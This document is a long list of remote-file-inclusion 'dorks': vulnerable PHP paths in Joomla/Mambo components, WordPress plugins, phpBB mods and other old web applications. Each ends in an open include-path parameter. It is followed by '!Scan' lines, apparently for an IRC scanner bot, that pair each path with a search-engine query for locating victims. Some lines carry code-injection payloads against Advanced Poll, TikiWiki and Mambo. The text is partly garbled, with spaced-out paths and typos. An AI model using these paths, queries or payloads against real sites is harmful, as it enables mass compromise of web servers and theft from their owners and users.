RFI Dorks
make jooml0 and mambo0
/ Components / com_flyspray / startdown.php? File =
/ Administrator / components / com_admin / admin.admin.html.php? MosConfig_absolute_path =
/ Components / com_simpleboard / file_upload.php? SBP =
/ Components / com_hashcash / server.php? MosConfig_absolute_path =
/ Components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php? MosConfig_absolute_path =
/ Components / com_sitemap / sitemap.xml.php? MosConfig_absolute_path =
/ Components / com_performs / performs.php? MosConfig_absolute_path =
/ Components / com_forum / download.php? Phpbb_root_path =
/ Components / com_pccookbook / pccookbook.php? MosConfig_absolute_path =
/ Components / com_extcalendar / extcalendar.php? MosConfig_absolute_path =
/ Components / minibb / index.php? Absolute_path =
/ Components / com_smf / smf.php? MosConfig_absolute_path =
/ Modules / mod_calendar.php? Absolute_path =
/ Components / com_pollxt / conf.pollxt.php? MosConfig_absolute_path =
/ Components / com_loudmounth / includes / abbc / abbc.class.php? MosConfig_absolute_path =
/ Components / com_videodb / core / videodb.class.xml.php? MosConfig_absolute_path =
/ Components / com_pcchess / include.pcchess.php? MosConfig_absolute_path =
/ Administrator / components / com_multibanners / extadminmenus.class.php? MosConfig_absolute_path =
/ Administrator / components / com_mgm / help.mgm.php? MosConfig_absolute_path =
/ Components / com_mambatstaff / mambatstaff.php? MosConfig_absolute_path =
/ Components / com_securityimages / configinsert.php? MosConfig_absolute_path =
/ Components / com_securityimages / lang.php? MosConfig_absolute_path =
/ Components / com_artlinks / artlinks.dispnew.php? MosConfig_absolute_path =
/ Components / com_galleria / galleria.html.php? MosConfig_absolute_path =
/ Akocomments.php? MosConfig_absolute_path =
/ Administrator / components / com_cropimage / admin.cropcanvas.php? Cropimagedir =
/ Cropcanvas.php? Cropimagedir =
/ Administrator / components / com_kochsuite / config.kochsuite.php? MosConfig_absolute_path =
/ Administrator / components / com_comprofiler / plugin.class.php? MosConfig_absolute_path =
/ Components / com_zoom / classes / fs_unix.php? MosConfig_absolute_path =
/ Components / com_zoom / includes / database.php? MosConfig_absolute_path =
/ Administrator / components / com_serverstat / install.serverstat.php? MosConfig_absolute_path =
/ Components / com_fm / fm.install.php? Lm_absolute_path =
/ Administrator / components / com_mambelfish / mambelfish.class.php? MosConfig_absolute_path =
/ Components / com_lmo / lmo.php? MosConfig_absolute_path =
/ Administrator / components / com_linkdirectory / toolbar.linkdirectory.html.php? MosConfig_absolute_path =
/ Components/com_mtree/Savant2/Savant2_Plugin_textarea.php? MosConfig_absolute_path =
/ Administrator / components / com_jim / install.jim.php? MosConfig_absolute_path =
/ Administrator / components / com_webring / admin.webring.docs.php? Component_dir =
/ Administrator / components / com_remository / admin.remository.php? MosConfig_absolute_path =
/ Administrator / components / com_babackup / classes / Tar.php? MosConfig_absolute_path =
/ Administrator / components / com_lurm_constructor / admin.lurm_constructor.php? Lm_absolute_path =
/ Components / com_mambowiki / Mam *** ogin.php? IP =
/ Administrator/components/com_a6mambocredits/admin.a6mambocredits.php? MosConfig_live_site =
/ Administrator / components / com_phpshop / toolbar.phpshop.html.php? MosConfig_absolute_path =
/ Components / com_cpg / cpg.php? MosConfig_absolute_path =
/ Components / com_moodle / moodle.php? MosConfig_absolute_path =
/ Components / com_extended_registration / registration_detailed.inc.php? MosConfig_absolute_path =
/ Components / com_mospray / scripts / admin.php? Basedir =
/ Administrator / components / com_bayesiannaivefilter / lang.php? MosConfig_absolute_path =
/ Administrator / components / com_uhp / uhp_config.php? MosConfig_absolute_path =
/ Administrator / components / com_peoplebook / param.peoplebook.php? MosConfig_absolute_path =
/ Administrator / components / com_mmp / help.mmp.php? MosConfig_absolute_path =
/ Components / com_reporter / processor / reporter.sql.php? MosConfig_absolute_path =
/ Components / com_madeira / img.php? Url =
/ Components / com_jd-wiki / lib / tpl / default / main.php? MosConfig_absolute_path =
/ Components / com_bsq_sitestats / external / rssfeed.php? Basedir =
/ Com_bsq_sitestats / external / rssfeed.php? Basedir =
/ Components / com_swmenupro / ImageManager / Classes / ImageManager.php? MosConfig_absolute_path =
/ Administrator / components / com_swmenupro / ImageManager / Classes / ImageManager.php? MosConfig_absolute_path =
/ Components / com_nfn_addressbook / nfnaddressbook.php? MosConfig_absolute_path =
/ Administrator / components / com_nfn_addressbook / nfnaddressbook.php? MosConfig_absolute_path =
/ Components / com_joomlaboard / file_upload.php? SBP =
/ Components / com_rwcards / rwcards.advancedate.php? MosConfig_absolute_path =
/ Components / com_thopper / inc / contact_type.php? MosConfig_absolute_path =
/ Components / com_thopper / inc / itemstatus_type.php? MosConfig_absolute_path =
/ Components / com_thopper / inc / projectstatus_type.php? MosConfig_absolute_path =
/ Components / com_thopper / inc / request_type.php? MosConfig_absolute_path =
/ Components / com_thopper / inc / responses_type.php? MosConfig_absolute_path =
/ Components / com_thopper / inc / timelog_type.php? MosConfig_absolute_path =
/ Components / com_thopper / inc / urgency_type.php? MosConfig_absolute_path =
/ Components / com_zoom / classes / IPTC / EXIF_Makernote.php? MosConfig_absolute_path =
/ Components / com_zoom / classes / IPTC / EXIF.php? MosConfig_absolute_path =
/ Modules / mod_weather.php? Absolute_path =
/ Components / calendar / com_calendar.php? Absolute_path =
/ Modules / calendar / mod_calendar.php? Absolute_path =
/ Components / com_calendar.php? Absolute_path =
/ Modules / mod_calendar.php? Absolute_path =
/ Components / com_mosmedia / media.tab.php? MosConfig_absolute_path =
/ Components / com_mosmedia / media.divs.php? MosConfig_absolute_path =
/ Administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php? MosConfig_live_site =
/ Administrator / components / com_joomlaflashfun / admin.joomlaflashfun.php? MosConfig_live_site =
/ Administrator/components/com_joom12pic/admin.joom12pic.php? MosConfig_live_site =
/ Components/com_slideshow/admin.slideshow1.php? MosConfig_live_site =
/ Administrator / components / com_panoramic / admin.panoramic.php? MosConfig_live_site =
/ Administrator / components / com_wmtgallery / admin.wmtgallery.php? MosConfig_live_site =
/ Administrator / components / com_wmtportfolio / admin.wmtportfolio.php? MosConfig_absolute_path =
/ Administrator / components / com_mosmedia / includes / credits.html.php? MosConfig_absolute_path =
/ Administrator / components / com_mosmedia / includes / info.html.php? MosConfig_absolute_path =
/ Administrator / components / com_mosmedia / includes / media.divs.php? MosConfig_absolute_path =
/ Administrator / components / com_mosmedia / includes / media.divs.js.php? MosConfig_absolute_path =
/ Administrator / components / com_mosmedia / includes / purchase.html.php? MosConfig_absolute_path =
/ Administrator / components / com_mosmedia / includes / support.html.php? MosConfig_absolute_path =
create wordpress
index/wp-content/plugins/Enigma2.php? boarddir =
mygallery / myfunctions / mygallerybrowser.php? myPath =
plugins / wp-table / js / wptable-button.phpp? wpPATH =
plugins / wordtube / wordtube-button.php? wpPATH =
plugins / myflash / myflash-button.php? wpPATH =
plugins / BackUp / archive.php? bkpwp_plugin_path =
plugins / BackUp / Archive / Predicate.php? bkpwp_plugin_path =
plugins / BackUp / Archive / Writer.php? bkpwp_plugin_path =
plugins / BackUp / Archive / Reader.php? bkpwp_plugin_path =
plugins / sniplets / modules / syntax_highlight.php? libpath =
/ Path/authentication/phpbb3/phpbb3.functions.php? PConfig_auth [phpbb_path] =
/ Includes / functions_portal.php? Phpbb_root_path =
/ Includes / functions_mod_user.php? Phpbb_root_path =
/ Includes / OpenID / Auth / OpenID / BBStore.php? Openid_root_path =
/ Language / lang_german / lang_main_album.php? Phpbb_root_path =
link_main.php? phpbb_root_path =
/ Inc / nuke_include.php? NewsSync_enable_phpnuke_mod = 1 & newsSync_NUKE_PATH =
MOD_forum_fields_parse.php? Phpbb_root_path =
/ Codebb / pass_code.php? Phpbb_root_path =
/ Codebb / lang_select? Phpbb_root_path =
includes / functions_nomoketos_rules.php? phpbb_root_path =
includes / functions.php? phpbb_root_path =
/ Includes / functions.php? Phpbb_root_path =
/ Ezconvert / config.php? Ezconvert_dir =
/ Includes / class_template.php? Phpbb_root_path =
/ Includes / usercp_viewprofile.php? Phpbb_root_path =
/ Includes / functions.php? Phpbb_root_path =
/ Includes / functions.php? Phpbb_root_path =
menu.php? sesion_idioma =
/ Includes / functions.php? Phpbb_root_path =
/ Admin / admin_linkdb.php? Phpbb_root_path =
/ Admin / admin_forum_prune.php? Phpbb_root_path =
/ Admin / admin_extensions.php? Phpbb_root_path =
/ Admin / admin_board.php? Phpbb_root_path =
/ Admin / admin_attachments.php? Phpbb_root_path =
/ Admin / admin_users.php? Phpbb_root_path =
/ Includes / archive / archive_topic.php? Phpbb_root_path =
/ Admin / modules_data.php? Phpbb_root_path =
/ Faq.php? Foing_root_path =
/ Index.php? Foing_root_path =
/ List.php? Foing_root_path =
/ Login.php? Foing_root_path =
/ Playlist.php? Foing_root_path =
/ Song.php? Foing_root_path =
/ Gen_m3u.php? Foing_root_path =
/ View_artist.php? Foing_root_path =
/ View_song.php? Foing_root_path =
/ Login.php? Foing_root_path =
/ Playlist.php? Foing_root_path =
/ Song.php? Foing_root_path =
/ Flash / set_na.php? Foing_root_path =
/ Flash / initialise.php? Foing_root_path =
/ Flash / get_song.php? Foing_root_path =
/ Includes / common.php? Foing_root_path =
/ Admin / nav.php? Foing_root_path =
/ Admin / main.php? Foing_root_path =
/ Admin / list_artists.php? Foing_root_path =
/ Admin / index.php? Foing_root_path =
/ Admin / genres.php? Foing_root_path =
/ Admin / edit_artist.php? Foing_root_path =
/ Admin / edit_album.php? Foing_root_path =
/ Admin / config.php? Foing_root_path =
/ Admin / admin_status.php? Foing_root_path =
language / lang_english / lang_prillian_faq.php? phpbb_root_path =
/ Includes / functions_mod_user.php? Phpbb_root_path =
/ Language / lang_french / lang_prillian_faq.php? Phpbb_root_path =
/ Includes / archive / archive_topic.php? Phpbb_root_path =
/ Functions_rpg_events.php? Phpbb_root_path =
/ Admin / admin_spam.php? Phpbb_root_path =
/ Includes / functions_newshr.php? Phpbb_root_path =
/ Zufallscodepart.php? Phpbb_root_path =
/ Mods / iai / includes / constants.php? Phpbb_root_path =
/ Root / includes / antispam.php? Phpbb_root_path =
/ PhpBB2/shoutbox.php? Phpbb_root_path =
/ Includes / functions_mod_user.php? Phpbb_root_path =
/ Includes / functions_mod_user.php? Phpbb_root_path =
/ Includes / journals_delete.php? Phpbb_root_path =
/ Includes / journals_post.php? Phpbb_root_path =
/ Includes / journals_edit.php? Phpbb_root_path =
/ Includes / functions_num_image.php? Phpbb_root_path =
/ Includes / functions_user_viewed_posts.php? Phpbb_root_path =
/ Includes / themen_portal_mitte.php? Phpbb_root_path =
/ Includes / logger_engine.php? Phpbb_root_path =
/ Includes / logger_engine.php? Phpbb_root_path =
/ Includes / functions_static_topics.php? Phpbb_root_path =
/ Admin / admin_topic_action_logging.php? Setmodules = pagestart & phpbb_root_path =
/ Includes / functions_kb.php? Phpbb_root_path =
/ Includes / bbcb_mg.php? Phpbb_root_path =
/ Admin / admin_topic_action_logging.php? Setmodules = attach & phpbb_root_path =
/ Includes / pafiledb_constants.php? Module_root_path =
/ Index.php? Phpbb_root_path =
/ Song.php? Phpbb_root_path =
/ Faq.php? Phpbb_root_path =
/ List.php? Phpbb_root_path =
/ Gen_m3u.php? Phpbb_root_path =
/ Playlist.php? Phpbb_root_path =
/ Language / lang_english / lang_activity.php? Phpbb_root_path =
/ Language / lang_english / lang_activity.php? Phpbb_root_path =
/ Blend_data / blend_common.php? Phpbb_root_path =
/ Blend_data / blend_common.php? Phpbb_root_path =
/ Modules / Forums / admin / index.php? Phpbb_root_path =
/ Modules / Forums / admin / admin_ug_auth.php? Phpbb_root_path =
/ Modules / Forums / admin / admin_board.php? Phpbb_root_path =
/ Modules / Forums / admin / admin_disallow.php? Phpbb_root_path =
/ Modules / Forums / admin / admin_forumauth.php? Phpbb_root_path =
/ Modules / Forums / admin / admin_groups.php? Phpbb_root_path =
/ Modules / Forums / admin / admin_ranks.php? Phpbb_root_path =
/ Modules / Forums / admin / admin_styles.php? Phpbb_root_path =
/ Modules / Forums / admin / admin_user_ban.php? Phpbb_root_path =
/ Modules / Forums / admin / admin_words.php? Phpbb_root_path =
/ Modules / Forums / admin / admin_avatar.php? Phpbb_root_path =
/ Modules / Forums / admin / admin_db_utilities.php? Phpbb_root_path =
/ Modules / Forums / admin / admin_forum_prune.php? Phpbb_root_path =
/ Modules / Forums / admin / admin_forums.php? Phpbb_root_path =
/ Modules / Forums / admin / admin_mass_email.php? Phpbb_root_path =
/ Modules / Forums / admin / admin_smilies.php? Phpbb_root_path =
/ Modules / Forums / admin / admin_ug_auth.php? Phpbb_root_path =
/ Modules / Forums / admin / admin_users.php? Phpbb_root_path =
/ Stat_modules / users_age / module.php? Phpbb_root_path =
/ Includes / functions_cms.php? Phpbb_root_path =
/ M2f/m2f_phpbb204.php? M2f_root_path =
/ M2f/m2f_forum.php? M2f_root_path =
/ M2f/m2f_mailinglist.php? M2f_root_path =
/ M2f/m2f_cron.php? M2f_root_path =
/ Lib / phpbb.php? Subdir =
/ Includes / functions_mod_user.php? Phpbb_root_path =
/ Includes / functions.php? Phpbb_root_path =
/ Includes / functions_portal.php? Phpbb_root_path =
/ Includes / functions.php? Phpbb_root_path =
/ Includes / functions_admin.php? Phpbb_root_path =
/ Toplist.php? F = toplist_top10 & phpbb_root_path =
/ Admin / addentry.php? Phpbb_root_path =
/ Includes / kb_constants.php? Module_root_path =
/ Auth / auth.php? Phpbb_root_path =
/ Auth / auth_phpbb / phpbb_root_path =
/ Auction / auction_common.php? Phpbb_root_path =
/ Auth / auth_SMF / smf_root_path =
/ Auth / auth.php? Smf_root_path =
! Scan / skin / zero_vote / ask_password.php? Dir = 'zeroboard "net" zeroboard "uk
! Scan classes / core / language.php? Rootdir = "LimeSurvey"
! Scan classes / core / language.php? Rootdir = 'You have not provided a survey identification number "
! Scan PHPDJ_v05/dj/djpage.php? Page = allintext: "PHPDJ was created by www.php-mania.co.uk "
! Scan / inc/cmses/aedating4CMS.php? Dir [inc] = inurl: flashchat
! Scan / photoalb / lib / static / header.php? Set_menu = allintitle: iPhotoAlbum
! Scan index.php? Redir = inurl: "index.php? redir ="
! Scan / phpopenchat / contrib / yabbse / poc.php? Sourcedir = intitle: PHPOpenChat ext: php
! Scan administrator / components / com_remository / admin.remository.php? MosConfig_absolute_path = inurl: "us / index.php? Option = com_remository
! Scan inc / functions.inc.php? Config [ppa_root_path] = "Index - Albums" inurl: index.php
! Scan inc / cmses / aedatingCMS.php? Dir [inc] = allinurl: "cmses"
! Scan phphtml.php? Htmlclass_path = phphtml.php
! Scan / phpsecurityadmin / include / logout.php? PSA_PATH = "PHPSecurityAdmin"
! Scan components / com_colorlab / admin.color.php? MosConfig_live_site = com_colorlab
! Scan / poll / comments.php? Id = {$ {include ($ ddd )}}{${ exit ()}}& ddd = "Advanced Poll"
! Scan active / components / XML-RPC / client.php? C [components] = "Pindorama"
! Scan apps / apps.php? App = WebDesktop
! Scan nuseo / admin / nuseo_admin_d.php? Nuseo_dir = "NuSEO PHP"
! Scan drupal /? _menu [Callbacks] [1] [callback] = Drupal
! Scan tikiwiki / tiki-graph_formula.php? W = 1 & h = 1 & s = 1 & min = 1 & max = 2 & f [] = x.tan.phpinfo () & t = png & title = TikiWiki
! Scan administrator / components / com_jcs / jcs.function.php? MosConfig_absolute_path = com_jcs
! Scan administrator / components / com_jcs / view / register.php? MosConfig_absolute_path = com_jcs
! Scan components/com_mp3_allopass/allopass.php? MosConfig_live_site = com_mp3_allopass
! Scan scan administrator / components / com_jcs / views / reports.html.php? MosConfig_absolute_path = "com_jcs"
! Scan / modules / Coppermine / themes / default / theme.php? THEME_DIR = "" Powered by Coppermine "
! Scan / default.php? Page = home inurl: "/ default.php? Page = home"
! Scan / default.php? Page = inurl: "/ default.php? Page = home"
! Scan / PhpLinkExchange / bits_listings.php? Svr_rootPhpStart = inurl: PhpLinkExchange
! Scan / openi-admin/base/fileloader.php? Config [openi_dir] = Powered by OPENi-CMS
! Scan / components/com_mp3_allopass/allopass.php? MosConfig_live_site =
! Scan / components/com_mp3_allopass/allopass-error.php? MosConfig_live_site =
! Scan index.php? Root_path = "powered by Open Bulletin Board"
! Scan config.php? Fpath = "Powered By PUMA"
! Scan / index.php? Classified_path = "Vivvo Article Manager"
! Scan index.php? Base = powered by MyABraCaDaWeb
! Scan pop.php? Base = powered by MyABraCaDaWeb
! Scan extras / ext_cats.php? dir_path = photokorn 1:52
! Scan content / article.php? Ide = inurl: WM-News
! Scan content / modify_go.php? Pwfile = inurl: WM-News
! Scan protection.php? Action = logout & siteurl = allinurl% 3Amembers.php% 3Fid% 3Dall + site% 3Anet
! Scan / inc / header.php / step_one.php? Server_inc = step_one.php? Sid
! Scan / language / lang_english / lang_main_album.php? Phpbb_root_path = "Powered by phpBB2 "site: fr
! Scan language / lang_english / lang_main_album.php? Phpbb_root_path = phpBB
! Scan phpwcms_template / inc_script / frontend_render / navigation / config_PHPLM.php? HTML_MENU_DirPath = Copyright © 2007 by Horst-D. · Kröller CMS: php WCMS
! Scan phpwcms_template / inc_script / frontend_render / navigation / config_HTML_MENU.php? HTML_MENU_DirPath = Copyright © 2007 by Horst-D. · Kröller CMS: php WCMS
! Scan index.php? Themesdir = "segue v." + "Middlebury College"
! Scan lib / base.php? BaseCfg [basedir] = actSite
! Scan index.php? Themesdir = "segue v." + "Middlebury College"
! Scan / includes / OpenID / Auth / OpenID / BBStore.php? Openid_root_path = "phpBB"
! Scan contrib / mx_glance_sdesc.php? Mx_root_path = "Mx_glance"
! Scan contrib / mx_glance_sdesc.php? Mx_root_path = "mxBB"
! Scan amember / plugins / payment / linkpoint / linkpoint.inc.php? Config [root_dir] = "amember"
! Scan news / newstopic_inc.php? Indir = "Public Media Manager"
! Scan phfito / phfito-post? SRC_PATH = "phpFidoNode"
! Scan / protection.php? Action = logout & siteurl = "/ members.php? Id = all"
! Scan / appserv / main.php? Appserv_root = "The AppServ Open Project"
! Scan includes / archive / archive_topic.php? Phpbb_root_path = IntegraMOD
! Scan admin / include / header.php? Repertoire = "chupix cms"
! Scan forum / forum.php? View = "lustig.cms"
! Scan access / login.php? Path_to_root = "FrontAccounting"
! Scan includes / lang / language.php? Path_to_root = "FrontAccounting"
! Scan dfd_cart / app.lib / product.control / core.php / product.control.config.php? Set_depth = "DFD Cart"
! Scan dfd_cart / app.lib / product.control / core.php / customer.area / customer.browse.list.php? Set_depth = "DFD Cart"
! Scan dfd_cart / app.lib / product.control / core.php / customer.area / customer.browse.search.php? Set_depth = "DFD Cart"
! Scan show.php? file = "Helplink"
! Scan data / compatible.php? Module_name = "Nuke Mobile Entartainment"
! Scan config.inc.php? _path = "WordSmith"
! Scan modules / search / search.php? Language_home = & rootdp = zzz & gsLanguage = "iziContents"
! Scan modules / poll / inlinepoll.php? Language_home = & rootdp = zzz & gsLanguage = "iziContents"
! Scan modules / poll / showpoll.php? language_home = & rootdp = zzz & gsLanguage = "iziContents"
! Scan modules / links / showlinks.php? Language_home = & rootdp = zzz & gsLanguage = "iziContents"
! Scan modules / links / submit_links.php? Rootdp = zzz & gsLanguage = "iziContents"
! Scan modifyform.html? Code = modifyform
! Scan Encoder.php? Base_dir = phpsyncml
! Scan Decoder.php? Base_dir = phpsyncml
! Scan administrator/components/com_joom12pic/admin.joom12pic.php? MosConfig_live_site = "com_joom12pic"
! Scan phpffl / phpffl_webfiles / program_files / livedraft / admin.php? PHPFFL_FILE_ROOT = "phpFFL"
! Scan phpffl / phpffl_webfiles / program_files / livedraft / livedraft.php? PHPFFL_FILE_ROOT = "phpFFL"
! Scan afb-3-beta-2007-08-28/_includes/settings.inc.php? Approot = "Ajax File Browser"
! Scan administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php? MosConfig_live_site = inurl: "com_joomlaradiov5"
! Scan config.php? Xcart_dir = "X-CART. Powerful PHP shopping cart software"
! Scan prepare.php? Xcart_dir = "X-CART. Powerful PHP shopping cart software"
! Scan smarty.php? Xcart_dir = "X-CART. Powerful PHP shopping cart software "
! Scan customer / product.php? Xcart_dir = "X-CART. Powerful PHP shopping cart software"
! Scan provider / auth.php? Xcart_dir = "X-CART. Powerful PHP shopping cart software"
! Scan admin / auth.php? Xcart_dir = "X-CART. Powerful PHP shopping cart software"
! Scan NuclearBB / tasks / send_queued_emails.php? Root_path = NuclearBB
! Scan protection.php? Action = logout & siteurl = "Site Layout & Graphics"
! Scan protection.php? Action = logout & siteurl = StatCounter
! Scan protection.php? Action = logout & siteurl = "PHPFanBase"
! Scan manager / admin / index.php? MGR = "phpRealty"
! Scan manager / admin / p_ins.php? MGR = "phpRealty"
! Scan manager / admin / u_ins.php? MGR = "phpRealty"
! Scan source / mod / rss / viewitem.php? Codebase = ED Engine
! Scan source / mod / rss / view.php? Codebase = ED Engine
! Scan source / mod / rss / post.php? Codebase = ED Engine
! Scan source / mod / rss / channeledit.php? Codebase = WebEd
! Scan joomla / index.php? Option = com_restaurante & task = "/ index.php? Option = com_restaurante"
! Scan modules / addons / plugin.php? Doc_root = "Txx cms"
! Scan modules / addons / plugin.php? Doc_root = inurl: addons
! Scan modules / Discipline / CategoryBreakdownTime.php? FocusPath = inurl: Discipline
! Scan modules / Discipline / CategoryBreakdownTime.php? Staticpath = inurl: Discipline
! Scan modules / Discipline / StudentFieldBreakdown.php? Staticpath = inurl: Discipline
! Scan lib / functions.php? DOC_ROOT = "Online Fantasy Football League"
! Scan lib / header.php? DOC_ROOT = "Online Fantasy Football League"
! Scan menu.php? Functions_file = phpMytourney
! Scan environment.php? DIR_PREFIX = AnyInventory
! Scan dbmodules / DB_adodb.class.php? PHPOF_INCLUDE_PATH = Phpof
! Scan stphpapplication.php? STPHPLIB_DIR = SpeedTech PHP Library
! Scan senetman / html / index.php? Page = eNetman
! Scan es_desp.php? Files_dir = Weblogicnet
! Scan es_custom_menu.php? Files_dir = Weblogicnet
! Scan es_offer.php? Files_dir = Weblogicnet
! Scan stphpbtnimage.php? STPHPLIB_DIR = SpeedTech PHP Library
! Scan stphpform.php? STPHPLIB_DIR = SpeedTech PHP Library
! Scan stphpapplication.php? STPHPLIB_DIR = "stph"
! Scan stphpbtnimage.php? STPHPLIB_DIR = "stph"
! Scan stphpform.php? STPHPLIB_DIR = "Stph"
! Scan senetman / html / index.php? Page = "senetman"
! Scan / intern / admin / other / backup.php? Admin = 1 & rootdir = "phpBG"
! Scan / intern / admin /? Rootdir = "phpBG"
! Scan / intern / clan / member_add.php? Rootdir = "phpBG"
! Scan / intern/config/key_2.php? Rootdir = "phpBG"
! Scan / intern / config / forum.php? Rootdir = "phpBG"
! Scan xGB.php? Act = admin & do = allinurl: "xGb.php"
! Scan modules / vwar / convert / mvcw_conver.php? Step = 1 & vwar_root = "mvcw_conver.php"
! Scan convert / mvcw.php? Vwar_root = "convert / mvcw.php"
! Scan convert / mvcw.php? Step = 1 & vwar_root = "convert / mvcw.php"
! Scan public_includes / pub_blocks / activecontent.php? VsDragonRootPath = inurl: activecontent.php
! Scan public_includes / pub_blocks / activecontent.php? VsDragonRootPath = "Php Blue Dragon"
! Scan ncaster / admin / addons / archive / archive.php? Adminfolder = inurl: ncaster
! Scan ncaster / admin / addons / archive / archive.php? Adminfolder = Ncaster 1.7.2
! Scan / chat/inc/cmses/aedating4CMS.php? Dir [inc] = inurl: flashchat site:. Ru
! Scan database.php? MosConfig_absolute_path = "powered by mambo "
! Scan config.php? Path_to_root = inurl: "path_to_root"
! Scan order / login.php? Svr_rootscript = "order? Page = plan_show"
! Scan admin / inc / change_action.php? Format_menue = "PHPNews Version 0.93"
! Scan order / login.php? Svr_rootscript = "order? Page = plan_show"
! Scan / include.php? Path [docroot] = inurl: "newspublish"
! Scan newsletter / newsletter.php? Waroot = inurl: newsletter.php?
! Scan mediagallery / public_html / Maint / ftpmedia.php? _MG_CONF [Path_html] = inurl: mediagallery /
! Scan beacon/language/1/splash.lang.php? LanguagePath = inurl: / beacon /
! Scan common / func.php? CommonAbsDir = inurl: func.php?
! Scan / surveys / survey.inc.php? Path = inurl: surveys
! Scan index.php? Body = inurl: "index.php? Body = '
! Scan / classes / adodbt / sql.php? Classes_dir = allinurl: adobt site: pl
! Scan enc / content.php? Home_Path = "powered by doodle cart"
! Scan / classified_right.php? Language_dir = inurl: classified.php phpbazar
! Scan / sources / functions.php? CONFIG [main_path] = "(Powered By ScozNews)"
! Scan / sources / template.php? CONFIG [main_path] = "(Powered By ScozNews)"
! Scan / embed / day.php? Path = intitle: "Login to Calendar"
! Scan / includes / dbal.php? Eqdkp_root_path = "powered by EQdkp"
! Scan / sources / join.php? FORM [url] = Owned & CONFIG [captcha] = 1 & CONFIG [path] = "Powered By Aardvark Topsites PHP 4.2.2"
! Scan / includes / kb_constants.php? Module_root_path = "Powered by Knowledge Base"
! Scan / mcf.php? Content = allinurl: "mcf.php" site:. de
! Scan / components / com_facileforms / facileforms.frame.php? Ff_compath = allinurl: "com_facileforms" site:. Org
! Scan skins/advanced/advanced1.php? Pluginpath [0] = "Sabdrimer CMS"
! Scan / zipndownload.php? PP_PATH = "Powered by: PhotoPost PHP 4.6"
! Scan / administrator / components / com_serverstat / install.serverstat.php? MosConfig_absolute_path = inurl: "com_serverstat"
! Scan / components / com_zoom / includes / database.php? MosConfig_absolute_path = inurl: "index.php? Option =" com_zoom "
! Scan / main.php? Sayfa = inurl: "main.php? Sayfa ="
! Scan / components / com_extended_registration / registration_detailed.inc.php? MosConfig_absolute_path = allinurl: com_extended_registration
! Scan / addpost_newpoll.php? Addpoll = preview & thispath = allinurl: "/ ubbthreads /"
! Scan / header.php? Abspath = "MobilePublisherPHP"
! Scan components / com_performs / performs.php? MosConfig_absolute_path = inurl: "com_performs"
! Scan administrator / components / com_remository / admin.remository.php? MosConfig_absolute_path = inurl: index.php? Option = com_remository
! Scan IMPEX / ImpExData.php? Systempath = intext: powered by vBulletin
! Scan / modules / vwar / admin / admin.php? Vwar_root = allinurl: vwar site:. Com
! Scan / coin_includes / constants.php? _CCFG [_PKG_PATH_INCL] = "Powered by phpCOIN"
! Scan administrator / components / com_remository / admin.remository.php? MosConfig_absolute_path = inurl: .com / index.php? Option = com_remository
! Scan / tools / send_reminders.php? Includedir = allinurl: day.php? Date =
! Scan / skin / zero_vote / error.php? Dir = skin / zero_vote / error.php
! Scan / modules / TotalCalendar / about.php? Inc_dir = allinurl: / TotalCalendar
! Scan / login.php? Dir = allinurl: login.php? Dir =
! Scan / tags.php? BBCodeFile = intitle: "Tagger LE" inurl: tags.php
! Scan index.php? Pageurl = inurl: "index.php? Pageurl =*. php"
! Scan / templates / headline_temp.php? Nst_inc = "fusion news management system "
! Scan index.php? Var = inurl: "index.php? Var =*. php"
! Scan index.php? Pagina = inurl: "index.php? Pagina =*. php"
! Scan index.php? Go = inurl: "index.php? Go ="
! Scan index.php? Site = inurl: "index.php? Site ="
! Scan phpwcms / include / inc_ext / spaw / dialogs / table.php? Spaw_root = inurl: "phpwcms / index.php? Id ="
! Scan administrator / components / com_comprofiler / plugin.class.php? MosConfig_absolute_path = inurl: ". Com .* / index.php? Option = com_comprofiler '
! Scan index.php? Pagina = inurl: "index.php? Pagina =*. php"
! Scan index.php? Id = inurl: "index.php? Id =*. php"
! Scan index1.php? = Inurl: "index1.php? =*. Php?
! Scan index.php? Site = inurl: "index.php? Site =*. php"
! Scan main.php? Id = inurl: "main.php? Id =*. php"
! Scan content.php? Page = inurl: "content.php? Page =*. php"
! Scan admin.php? Page = inurl: "admin.php? Page =*. php"
! Scan lib / gore.php? Libpath = inurl: "/ SQuery /"
! Scan SQuery / lib / gore.php? Libpath = inurl: "/ SQuery /"
! Scan index2.php? P = inurl: "index2.php? P =*. php"
! Scan index1.php? go = inurl: "index1.php? go =*. php"
! Scan news_detail.php? File = inurl: "news_detail.php? File =*. php"
! Scan old_reports.php? File = inurl: "old_reports.php? File =*. php"
! Scan index.php? X = inurl: "index.php? X =*. php"
! Scan index.php? Nic = inurl: "index.php? Nic =*. php"
! Scan homepage.php? Cell = inurl: "homepage.php? Cells =*. php"
! Scan index.php? Cell = inurl: "index.php? Cells =*. php"
! Scan main.php? X = inurl: "main.php? X =*. php"
! Scan components / com_artlinks / artlinks.dispnew.php? MosConfig_absolute_path = "inurl: com_artlinks"
! Scan index2.php? X = inurl: index2.php? X =*. php "
! Scan main.php? Pagina = inurl: "main.php? Pagina =*. php"
! Scan test.php? Page = allinurl: test.php? Page =
! Scan components / com_phpshop / toolbar.phpshop.html.php? MosConfig_absolute_path = "inurl: com_phpshop"
! Scan akocomments.php? MosConfig_absolute_path = inurl: akocomments.php
! Scan index.php? Page = inurl: "edu / index.php? Page =*. php"
! Scan *. php? Page = inurl: *. php? Page =*. php "
! Scan index.php? Oldal = inurl: "index.php? Oldal =*. php"
! Scan index.php? Lang = gr & file inurl: "index.php? lang = gr & file =*. php"
! Scan index.php? Pag = inurl: "index.php? Pag =*. php"
! Scan index.php? Incl = inurl: "index.php? Incl ="
! Scan avatar.php? Page = inurl: "avatar.php? Page ="
! Scan index.php? _REQUEST = & _REQUEST% 5boption% 5d = com_content & _REQUEST% 5bItemid% 5d = 1 & GLOBALS = & mosConfig_absolute_path = "Mambo is A Free
! Scan index.php? _REQUEST = & _REQUEST% 5boption% 5d = com_content & _REQUEST% 5bItemid% 5d = 1 & GLOBALS = & mosConfig_absolute_path = "Mambo is"
! Scan ndex.php? P = inurl: "edu / index.php? P =*. php"
! Scan / modules / xgallery / upgrade_album.php? GALLERY_BASEDIR = allinurl: / xgallery /
! Scan index.php? X = inurl: "com / index.php? X =*. php"
! Scan index.php? Mode = inurl: "com / index.php? mode =*. php"
! Scan index.php? Stranica = inurl: "index.php? Stranica ="
! Scan index.php? Sub = inurl: "il / index.php? Sub =*. php"
! Scan index.php? Id = inurl: "/ index.php? Id =*. php"
! Scan index.php? T = inurl: "/ index.php? T =*. php"
